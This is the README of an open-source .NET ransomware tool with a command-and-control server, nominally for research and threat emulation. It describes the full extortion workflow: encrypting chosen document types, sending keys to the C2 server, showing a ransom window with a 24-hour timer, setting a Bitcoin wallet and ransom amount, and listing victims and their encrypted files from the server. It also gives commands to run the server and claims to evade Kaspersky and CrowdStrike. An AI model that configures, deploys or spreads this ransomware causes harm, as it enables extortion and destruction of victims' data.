An open-source ransomware tool written in .NET
The tool is intended for research and threat emulation purposes only. I'm not reponsible for any malicious uses of this tool.
1- A symmetric AES (256bit) key is generated.
2- Documents are collected from predefeind directories including its sub-directories.
3- The key is encrypted with a static public RSA key and sent to the C2 server.
4- The C2 server returns an GUID for identification and logs the details to CryptushServer.log
5- The encryption key is then deleted from memory on the victim host and a window is presented including a decryption option and a 24 hours timer.
- The ransomeware will not run in there's no communication to the C2 server. A reconnect attempt will be made every 30 seconds.
- Edit the app.config file inside the Cryptush folder with your details:
<add key="ServerIP" value="" />
<add key="ServerPort" value="443" />
<add key="Email" value="" />
<add key="BtcWalletAddress" value="bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh" />
<add key="BtcAmount" value="0.035" />
- Select the folders to be encrypted in Cryptush.cs, the default is:
public static string[] paths = {
- The default extensions are:
var extensions = new List<string> { ".xls", ".doc", ".ppt", ".pdf", ".txt" };
You can change them in Cryptush/lib/Collector.cs
You can view details about the encrypted victims using the "list" command (hostname, username, launch time, time left for payment, etc.).
You can view details about the encrypted files on each victim using the "files" command.
sudo dpkg -i packages-microsoft-prod.deb
sudo apt update
sudo apt install -y dotnet-runtime-5.0
sudo dotnet CryptushServer.dll --ip=* --port=443
- Kaspersky - PASS
- CrowdStrike - PASS
- Client - .NET Framework 4.8
- Server - .NET core 5.0